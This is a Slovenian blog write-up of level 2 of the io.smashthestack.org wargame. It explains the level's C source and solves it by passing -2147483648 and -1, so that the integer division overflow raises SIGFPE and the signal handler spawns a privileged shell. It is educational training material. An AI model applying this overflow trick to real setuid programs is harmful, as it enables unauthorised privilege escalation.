CREATIVE CHAOS   ▋ blog

io.smashthestack.org / level02

PUBLISHED ON 21/01/2016 — EDITED ON 14/12/2023 — .SL, INFOSEC

Intro

Nekaj besed o drugi stopnji io.smashthestack.org.

Povezava

$ ssh -l level2 io.smashthestack.org -p2224

Oboroženi z visoko stopnjo samozavesti najprej preizkusimo tisto kar je delovalo na prvi stopnji:

  level2@io:/levels$ ./level02
  source code is available in level02.c

Namig je več kot dobrodošel, preverimo izvorno kodo:

  level2@io:/levels$ cat level02.c
  //a little fun brought to you by bla
  
  #include 
  #include 
  #include 
  #include 
  
  void catcher(int a)
  {
      setresuid(geteuid(),geteuid(),geteuid());
  	printf("WIN!\n");
      system("/bin/sh");
      exit(0);
  }
  
  int main(int argc, char **argv)
  {
  	puts("source code is available in level02.c\n");
  
      if (argc != 3 || !atoi(argv[2]))
          return 1;
      signal(SIGFPE, catcher);
      return abs(atoi(argv[1])) / atoi(argv[2]);
  }

Hiter pregled C kode nam pove:

 * pri zagonu programa potrebujemo poleg imena programa še dva argumenta (`argc != 3`)
 * drugi argument ne sme biti `0` (`!atoi(argv[2])`)
 * oba argumenta morata biti celi števili, ker sta vhod fukcije `atoi()`, ki spremeni niz znakov v celo število.

argc je števec argumentov, ang. argument count argv je kazalec na argument, ang. argument vector

Večino C-jevskih pojasnil lahko najdemo kar v priloženih navodilih:

  man atoi

atoi

Funkcija int atoi(const char *nptr);, spremeni niz znakov v celo število. Niz mora vsebovati primerno celo število, sicer funkcija vrne 0. Številka je lahko zaključena s katerikolim znakom, ki ni del celega števila (presledek, ločila,…).

signal

Nastavi določeno funkcijo, kot odziv na prejeti signal. Torej v primeru, ko program prejme ta določen signal, pokličemo nastavljeno funkcijo.

Določimo lahko specifično funkcijo oziroma enega izmed dveh makrojev: SIG_DFL privzet odziv na signal SIG_IGN ignoriraj signal SIGFPE (ang. Signal Floating-Point Exception) napačna aritmetična operacija (npr. deljenje z 0)

Za nas zanimiva je predvsem ta vrstica v navodilih:

(Also dividing the most negative integer by -1 may generate SIGFPE.)

Torej deljenje najbolj negativnega celega števila z -1 lahko privede do signala SIGFPE.

abs

Funkcija int abs(int j);, vrne absolutno vrednost celega števila. Absolutna vrednost najbolj negativnega celega števila ni definirana.

Epilog

  level2@io:/levels$ ./level02 -2147483648 -1
  source code is available in level02.c
  
  WIN!
  sh-4.2$ 

See Also

TAGS: BASH, C, HACK, HACKS, LINUX, SMASH